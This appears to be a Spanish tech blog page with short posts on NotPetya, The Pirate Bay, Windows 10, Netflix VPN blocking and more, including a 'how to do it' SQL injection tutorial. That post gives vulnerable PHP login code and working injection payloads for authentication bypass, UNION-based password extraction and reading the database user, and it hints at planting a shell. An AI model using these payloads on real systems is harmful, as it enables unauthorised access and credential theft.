Publicado el

Evita el NotPetya la nueva plaga de Ransomware con este siempre comando

En los últimos dias se ah propagado una nueva amenaza que llego para ocupar el lugar  del Ransomware que trajo al mundo de cabeza  los pasados meses.

Evita el mas rato y tener la perder tu información ejecutando este comando, este es una vacuna para evitar que el Ransomware cambien de exención los ficheros de tu equipo.

Funciona en todas las versiones de windows, y recuerden siempre actualizar sus parches de seguridad, ya que en estos últimos días windows sacara su parche de seguridad para evitar este fallo.

En la consola:
CD %Systemroot%
echo.x>>perfc
attrib +r perfc

Eso es todo 

Comenten si les funciono,  y cuidado con lo que abren en internet.

En los últimos días estaremos subiendo mas contenido a la web.

Publicado el

The Pirate Bay Comienza con el Streaming de Películas

A pesar de que numerosos servicios similares ya han tenido un fatal destino como, recientemente fue el caso de la famosa aplicación de streaming Popcorn Time, eso no ha asustado a la gente de la “Bahía” de torrents más famosa del mundo.

Así es, por si no les bastara con ser una de las páginas de piratería más amadas por los usuarios, pero más odiadas por todas las empresas de contenido multimedia, The Pirate Bay pretende ir un paso más allá al ofrecer ahora una nueva modalidad de streaming.

ejemplo

La gente de The Pirate Bay aclara que esta nueva modalidad se encuentra todavía en fase de prueba, algo que queda en evidencia a la hora de probarlo, debido a que algunos contenidos no se llegan a reproducir correctamente o quedan pausados.

Sobre el plugin de TorrentsTime, éste, al igual que otros servicios, ofrece la inclusión automática de subtítulos, así como soporte para Chromecast, Airplay y DLNA. También hacen la advertencia/recomendación de emplear un servicio de VPN para protoger nuestra privacidad.

eje2

Sin duda una acción interesante por parte de este servicio ilegal, del cual suponemos que en poco tiempo funcionará plenamente y gracias a su extenso historial de cierres y reaperturas no dudamos que al igual que otras páginas de este tipo dure muchos años.

Fuente:unocero.com

Publicado el

PlayStation Messages: la nueva aplicación de mensajería para gamers

Sony separa sus aplicaciones móviles en dos partes: PlayStation Messages será exclusiva para conversaciones, y elimina los chats de la app compañera de PS4.

PS4Logo

Sony lanzó hoy una nueva aplicación independiente de mensajería para manejar tus conversaciones de PSN. La app compañera para iOS y Android recibió hoy una actualización que requiere instalar PlayStation Messages en nuestros dispositivos para poder seguir disfrutando de las funciones de chat con nuestros amigos de PS4 en el móvil.

La nueva aplicación es mucho más rápida que la de PlayStation, quien la ha usado sabe que se hace viejo esperando tan solo a que abra. Además soporta grupos, tiene stickers de muchos videojuegos, y te permite descargar las imágenes que compartes o te envían desde un PS4 a tu móvil.

playstation-messages

 

Publicado el

iOS 9 VS Android 6, Con Cual te quedas?

ios-9-vs-android-6-comparativa-interfaz-usuario

iOS 9 vs. Android 6.0 Marshmallow Apple y Google son las dos empresas con más usuarios en sus sistemas operativos para móviles. Millones de personas alrededor del mundo eligen entre una y otra alternativa, defendiendo los iPhone o los móviles Android de diferentes fabricantes. Cada año hay una nueva batalla a medida que salen actualizaciones y nuevas versiones de los sistemas operativos, y con iOS 9 no iba a ser distinto. Desde TodoiPhone.net hemos decidido hacer una comparación entre las más recientes versiones de ambas plataformas. iOS 9 por el lado de Apple, y Android 6.0 Marshmallow por parte de la gente de Google.

ios-9-vs-android-6-0-marshmallow-home-screen (1)

Disponibilidad

De momento iOS 9 está disponible en los nuevos iPhone 6s y iPhone 6s Plus, así como en dispositivos más viejos desde el iPhone 4s hasta el iPad 2. En cambio, el sistema operativo Android 6.0 Marshmallow únicamente corre en los nuevos teléfonos móviles Google Nexus 4X y 6P, y en algunas unidades de la generación anterior. Tanto uno como otro tienen sus ventajas y desventajas, desde lo estético hasta lo práctico y funcional. Pero también hay que remarcar que ninguna de las dos actualizaciones representa un gran cambio a nivel estético. El diseño de ambos sistemas operativos parece estar más apuntado a conseguir un mejor rendimiento y funciones que trabajan en segundo plano para mejorar la experiencia del usuario. Distintos sitios web han realizado pruebas y encuestas para ver qué opinión tienen los usuarios acerca de los sistemas operativos, y de acuerdo a la votación llevada a cabo por la gente de PhoneArena.com, el ganador indiscutido es Android 6.0 Marshmallow. Te mostramos un poco, en imágenes y video, lo que sucede con al comparar los puntos más importantes en materia estética y de diseño de iOS 9 y Android 6.0.

ios-9-vs-android-6-0-marshmallow-lock-screen-347x309ios-9-vs-android-6-0-marshmallow-siri-google-now-search-347x307 ios-9-vs-android-6-0-marshmallow-settings-235x208 ios-9-vs-android-6-0-marshmallow-control-center-235x208

Los usuarios prefieren Android

Al menos eso se desprende de la encuesta de PhoneArena. El nuevo sistema operativo para móviles y tablets de Google consiguió 13,793 votos contra los 7,785 que acumuló iOS 9, la más reciente iteración de la plataforma móvil de Apple. Las respuestas detrás de esta diferencia pueden encontrarse principalmente en los grandes errores que tuvo iOS 9 con los dispositivos más antiguos. Al consumidor no le gustó tener tantas actualizaciones pequeñas en menos de 2 semanas (iOS 9.0.1 – iOS 9.0.2 y luego la versión final de iOS 9.1), y la respuesta fue un voto mucho más masivo hacia la iniciativa de Google con Android 6.0 Marshmallow, un sistema que, como se puede ver en las comparaciones, tiene un estilo minimalista bastante similar.

 

Publicado el

Windows 10 usa tu ancho de banda para actualizar a otros, te decimos cómo evitarlo

Windows 10 finalmente ya está aquí y llega con muchas funciones que realmente estamos disfrutando, pero a su vez también llega con algunos fallos, pequeños y grandes. Aunque técnicamente esto no es un fallo, sí que comparte tu ancho de banda para ayudar a actualizar a otros sin tu permiso, pero tranquilo, te enseñamos a evitarlo.

Esta característica lleva el nombre de “Windows Update Delivery Optimization” y funciona prácticamente de la misma forma que las descargas por torrents, es decir, el protocolo P2P (peer to peer) para compartir archivos. La idea es que tu PC se une a una red de Microsoft que colabora en que la actualización del sistema (ya sea Windows 10 o las futuras actualizaciones) lleguen más rápido a los demás usuarios, una vez que tu la tienes.
Por un lado es una función bastante inteligente, no lo niego, pero por otro es un abuso de confianza (somos amigos, Micro, pero no presto mis cosas) dado que no solicita permiso al usuario. Sencillamente, de forma predeterminada, toma prestado un poco de tu ancho de banda para acelerar el proceso de actualización, ya sea para computadoras en tu red local o en cualquier parte del mundo.
Dicha función está activada por defecto en Windows 10 Home y Pro, aqui te damos los pasos para desactivarla:
  • Dirígete al Panel de Control
  • Accede al apartado de Windows Update
  • Luego a Opcioens Avanzadas
  • Allí accede al apartado de “Elegir cómo se instalan las actualizaciones”

Tienes tres opciones: activarlo para que comparta tu ancho de banda con PCs en tu red local y en el mundo, activarlo para que las comparta solo en tu red local (lo que podría ser útil para quienes tengan varios PCs) o desactivarlo por completo.

Fuente: http://thenextweb.com/microsoft/2015/07/30/windows-10-steals-your-bandwidth-to-send-other-people-updates/

Publicado el

Strml – Una web que se construye sola

Si estas aprendiendo a programar páginas web, a entender mejor lo que se puede hacer con CSS y a jugar con HTML5, echad un vistazo en strml.net.

Se trata de un proyecto creado por Samuel Reeds, programador que decidió crear una web que se construye a media que leemos, ya que el texto, en inglés, va indicando las alteraciones que la propia web va sufriendo.

Nada más entrar veremos un texto negro con fondo blanco, texto que empieza a aparecer queriendo “más cambios”. A medida que el tiempo pasa, la propia web indica los cambios sufridos: columnas, colores, efectos… ayudando así a entender cómo afecta el código al resultado final.

La animación puede pararse en cualquier momento, siendo así un excelente recurso para comentarlo en clase, ayudando a entender mejor la estructura de una web moderna.

strml

 

Como ves en la imagen, el resultado final no es impresionante, pero sí muy didáctico. En este caso está claro que lo que importa es el camino recorrido, y la original forma de mostrarlo.

Publicado el

PornHub Regala Computadora a Usuario

Una web porno regala un portátil a un usuario que rompió el suyo al ser descubierto  su madre

qr25D

Denzel, un joven inglés, tuvo que romper su ordenador portatil mientras veía porno para que su madre no le pillara. Desolado por ello, optó por desahogarse publicando su historia en Twitter. Mencionó a la página web que estaba viendo cuando ocurrió todo y, lejos de lavarse las manos, la empresa optó por ayudarle.

d1Kzr

Pornhub, una de las web de porno más potentes a nivel mundial, quiso consolar a su fan. No solo respondieron a Denzel a través de Twitter, sino que fueron un paso más allá y le mandaron un nuevo portatil por ser “un fan tan leal”.

Según el diario británico The Mirror, el propio vicepresidente de la página web, Corey Price, se ha preocupado mucho por lo sucedido y ha mandado ánimos al joven. “Queremos obsequiarle con un ordenador nuevo y un pack de Pornhub para su placer continuo”, aseguró Price.

 

LR6o

El joven inglés se ha ganado una fama a nivel mundial por su portátil roto. Con dos nuevos tuits ha mostrado a todo el mundo el obsequio de Pornhub y les ha dado las gracias.

6vx8d

 

Publicado el

Tutorial SQL Injection ¿Como se Hace?

La inyección SQL es el ataque vía web, que aprovecha errores en la filtración de datos introducidos por el usuario, y que permiten a un atacante, tener control de cierta aplicación.

Atención

Es recomendable tener un poco de conocimiento en PHP para  el mejor entendimiento de los  Códigos.

Los ataques SQL pueden ser evitados de muchas formas, iniciare con algunos ejemplos de instrucciones vulnerables, con las “magic quotes” desactivadas.

Ejemplo 1

Código:
$us=$_POST[‘usuario’];
$pass=$_POST[‘pass’];
$sql=”SELECT * FROM usuarios WHERE user = ‘$us’ AND password=’$pass'”;
Código:
if(mysql_fetch_array($exc)){
echo “Inicio de sesión correcto”; // Esto fue modificado
}
Este es el tipico sistema de verificación de contraseñas. Utiliza la instruccion mysql_fetch_array(funcion de mysql, que devuelve falso si no hay ningún resultado, en la ‘querry’, o petición), asi que si no hay ningún resultado donde el usuario y el password conuerden, el resultado es false.

como podemos hacer que no devuelva false??

  • Con el password correcto
  • Haciendo trampa

En este caso como no conocemos el password correcto  usaremos la segunda opción:

Haciendo trampa.. se haría algo así:

esta es la petición que solo nos deja pasar si sabemos el password:
Código
SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'ahora, ¿como se puede hacer que nos devuelva true aunque no sepamos el password, sabiendo que solo podemos modificar $pass y $us?
Supongamos que ponemos de usuario betito, y de password pass1234.
El usuario existe, pero no sabemos el pass..
la sentencia que SQL recibirá seria :

Código:
SELECT * FROM usuarios WHERE user = 'betito' AND password='pass1234'
Como no hay ningun campo donde el usuario y el password coincidan, nos devolvera false.
Ahora, con un poco de creatividad:
de usuario:   betito
de password: ‘ OR ”=’la sentencia SQL recibira:

SELECT * FROM usuarios WHERE user = 'betito' AND password='' OR ''=''

nos devolvera true, si hay algun resultado y como NADA siempre es igual a NADA, nos devolvera true, y pasamos el mecanismo de validación como el usuario betito.

Otros posibles valores que devuelven true son:

  • usuario: betito AND /*   password: */ ”=’
  • usuario: ‘ OR 1=1 //

Ahora… que si quisieras saber el password.. (te advierto, que normalmente esta cifrado, y deberas desencriptarlo, con alguna herramienta para eso como john the ripper), tomemos el siguiente ejemplo.

Ejemplo 2
Código:
$us=$_POST[‘usuario’];
$pas=$_POST[‘pass’];
if($_GET[‘usuario’] || $_GET[‘pass’]){
die(“Hack Attempt”);
}
$sql=”SELECT password FROM usuarios WHERE user = ‘$us'”;
Código:
$resp = mysql_query($sql) or die(mysql_error());
if(mysql_fetch_array($resp)){
if($resp==$pas){
echo “Inicio de sesión exitoso”; // Esto fue modificado
}else{
echo “el password $resp es incorrecto”;
}
}
 Bien, este ejemplo, que se ve mucho mas seguro  y surge la pregunta , ¿es vulnerable?
SI, ¿porque?
Ya quedamos en que no hay magic quotes, las magic quotes son una función que trata de desactivar todas las cadenas introducidas por el usuario, que parezcan peligrosas, como comillas, diagonales, \0 etc..
el webmaster pensó, que como no usaba el mysql_fetch_array, entonces no podian usar un ‘ OR ”=’, como la inyección clasica, pasada.Ahora, queremos sacar el password.. pero.. ¿como?

Hay una instruccion en SQL llamada UNION, que sirve para obtener información de 2 tablas, o..
Bueno.. UNION necesita algunos requisitos.

  • Necesitas meter la misma cantidad de valores que tiene la tabla.
  • Tener un informe de los errores que provocaremos en la instrucción

Bien ahora empezemos.
la instrucción a modificar es la siguiente:

Còdigo:
SELECT password FROM usuarios WHERE user = '$us'como ejemplo, si colocamos de usuario: maestro
la instrucción que llega seria:

 

Código:
SELECT password FROM usuarios WHERE user = 'maestro'

regresemos al UNION.

UNION necesita que el numero de columnas sea igual, sino sacara un error.

y exactamente, lo que necesitamos es un error, que nos diga cuando estamos mal, para saber cuando estamos bien.

el UNION se usa de esta forma:

usuario: ‘ AND 0 UNION SELECT 1 AND ‘l’=’
SELECT password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

para lo cual SQL nos respondera:

Código Regreso:
The used SELECT statements have a different number of columns:SELECT password FROM usuarios WHERE user = ” AND 0 UNION SELECT 1 AND ‘l’=”

Continuando por el mismo camino, podemos hacer que nos regrese un error, al tratar de UNIR un campo de tipo INT (osea que guarda numeros) a un CHAR (guarda letras)

Quedaria algo así:

‘ UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = ‘maestro’

la sentencia seria esta:

SELECT password FROM usuarios WHERE user = '' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'maestro'

que nos da como error:

Codigo
Syntax error converting the varchar value ‘12345’ to a column of data type int.

donde el password es 12345

Las inyecciones ultimamente han logrado tener mas poder que antes,  debemos sacar toda la información posible, y con un poco de esfuerzo, conseguimos tener control de archivos (crear, borrar, etc..).el siguiente es un ejemplo, con la misma sentencia usuario:

Código:

‘ AND 0 UNION SELECT 1,user(),3,4,5 AND ‘l’=’

y nos regresa:

Código Respuesta:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation ‘UNION’

que significa esto? que estamos metiendo valores en utf cuando debe ser en latin1.. eso lo arreglamos asi:

‘ AND 0 UNION SELECT 1,convert(user() using latin1),3,4,5 AND ”l=’

y eso nos regresa:

Código Shell:
root@localhost
esto, no es todo, con hacer que regrese valores con ‘<??>’, podemos incluso crearnos nuestra shell.
Bueno amigos esto fue todo el tutorial esperando sus comentarios .
Nos vemos en el siguiente Tutorial.
Publicado el

Netflix Bloqueara el Uso de VPN y Proxys.

netflix-television

Los servicios de streaming como Netflix son siempre más variados en Estados Unidos, por ello, muchos de nosotros utilizamos un pequeño truco con el cual podemos ingresar al catálogo de ese país, pues bien, parece ser que la compañía lo ha hecho de nuevo (la primera fue su cambio de costos) y aparentemente ha comenzado a bloquear proxys o VPN.

Con los proxys y VPN podíamos hacer pensar a nuestra computadora que estábamos en otra parte del mundo, pues a Netflix no le ha gustado nada y lo ha comenzado a bloquear, por ejemplo, en la aplicación de Android solamente puede acceder con un proxy de Google, lo cual inhabilita cualquier modificación.

descargaPor otro lado, usuarios de TorGuard han informado a TorrentFreak que varios de ellos han sido bloqueados al usar uno de esos trucos, pero que ciertamente se trata de casos aislado como para mencionar de una redada o implementación masiva.

 

Lo que sabemos por ahora es que posiblemente Netflix utiliza el navegador de tu computadora o el GPS de tu smartphone o tablet para establecer el huso horario que tienes y así verificar el lugar de donde estás visualizando el contenido, esperemos que pronto se anuncie por lo menos que se está bloqueando o sino, que simplemente dejen las cosas como están.

Publicado el

Hive la nueva alternativa para almacenar sin limites en la Nube

Hive permite subir diversos tipos de archivos sin cobrar, convirtiéndose en rival para servicios como Dropbox y Box. Tiene además funciones de red social, se puede escuchar música y ofrece acceso a cuentas premium a quienes tengan más de 100 amigos.

0011678317 0011678324Tras un breve período de pruebas limitadas, Hive abrió finalmente su servicio a los usuarios para que suban diversos tipos de archivos, sin límites de almacenamiento ni costos. 

Hive solo cobra por pocas funciones premium, como la visualización de videos en HD y la desaparición de anuncios publicitarios. Después, dicen sus creadores, el usuario podrá subir videos de incluso 4 TB.

A diferencia de Dropbox, Box, Google Drive y SkyDrive, entre otros, Hive suma funciones sociales: se pueden agregar amigos y ver, si así lo deciden, sus fotos, videos u otros archivos. Incluso, como cuenta con un reproductor multimedia, los usuarios son capaces de escuchar la música que otros almacenan.

0011678310Hive aún está en etapa de pruebas, por lo que su servicio puede mostrarse inestable. A cambio, sus creadores proponen acceso a funciones premium sin costo. 
Cuando la beta finalice, el costo del servicio premium será de u$s9 mensuales si el usuario tiene menos de 10 amigos; de u$s6 en caso de tener más de 10; ascenderá a u$s3 para aquellos con más de 50; y será gratuito para quienes superen los 100 contactos.

Hive es ofrecido por la firma QVIVO, basada en Hong Kong y dedicada a ofrecer almacenamiento en la nube. En una entrevista con TorrentFreak, los creadores explicaron que un servicio se diferencia del otro por su parte social.